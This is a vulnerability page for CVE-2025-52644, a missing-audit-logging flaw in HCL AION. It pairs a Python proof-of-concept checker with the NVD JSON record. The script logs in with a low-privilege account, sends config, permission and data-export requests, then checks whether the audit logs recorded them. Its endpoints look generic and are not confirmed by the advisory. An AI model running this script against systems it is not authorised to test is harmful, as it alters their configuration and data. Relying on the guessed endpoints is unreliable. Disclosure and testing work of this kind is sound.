CVE-2025-52644

# CVE-2025-52644 PoC - HCL AION审计日志缺失验证 # This PoC demonstrates the lack of audit logging for certain user actions import requests import json TARGET_URL = "https://target-aion-server.com" API_ENDPOINT = "/api/v1/audit-check" def check_audit_logging(): """ Check if user actions are properly logged in HCL AION """ # Step 1: Authenticate with low-privilege account auth_payload = { "username": "standard_user", "password": "password123" } session = requests.Session() auth_response = session.post(f"{TARGET_URL}/auth/login", json=auth_payload) if auth_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authenticated successfully with low-privilege account") # Step 2: Perform sensitive operation sensitive_actions = [ "/api/v1/config/modify", "/api/v1/users/permissions/change", "/api/v1/data/export" ] for action in sensitive_actions: response = session.post(f"{TARGET_URL}{action}", json={ "action": "sensitive_operation", "target": "system_config" }) if response.status_code == 200: print(f"[+] Action {action} executed successfully") # Step 3: Query audit logs audit_response = session.get(f"{TARGET_URL}/api/v1/audit/logs") audit_logs = audit_response.json() # Step 4: Check if actions were logged for action in sensitive_actions: if action not in str(audit_logs): print(f"[!] VULNERABLE: Action {action} NOT found in audit logs") return True print("[-] All actions were properly logged") return False if __name__ == "__main__": print("CVE-2025-52644 - HCL AION Audit Logging Vulnerability Checker") print("=" * 60) check_audit_logging()

{"cve": {"id": "CVE-2025-52644", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:18.567", "lastModified": "2026-04-28T21:42:03.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where certain user actions are not adequately audited or logged. The absence of proper auditing mechanisms may reduce traceability of user activities and could potentially impact monitoring, accountability, or incident investigation processes."}, {"lang": "es", "value": "HCL AION se ve afectado por una vulnerabilidad donde ciertas acciones de usuario no son auditadas o registradas adecuadamente. La ausencia de mecanismos de auditoría adecuados puede reducir la trazabilidad de las actividades del usuario y podría potencialmente impactar los procesos de monitoreo, rendición de cuentas o investigación de incidentes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-778"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "1AD0DD06-7840-4FFE-8BCF-1B94410B237D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}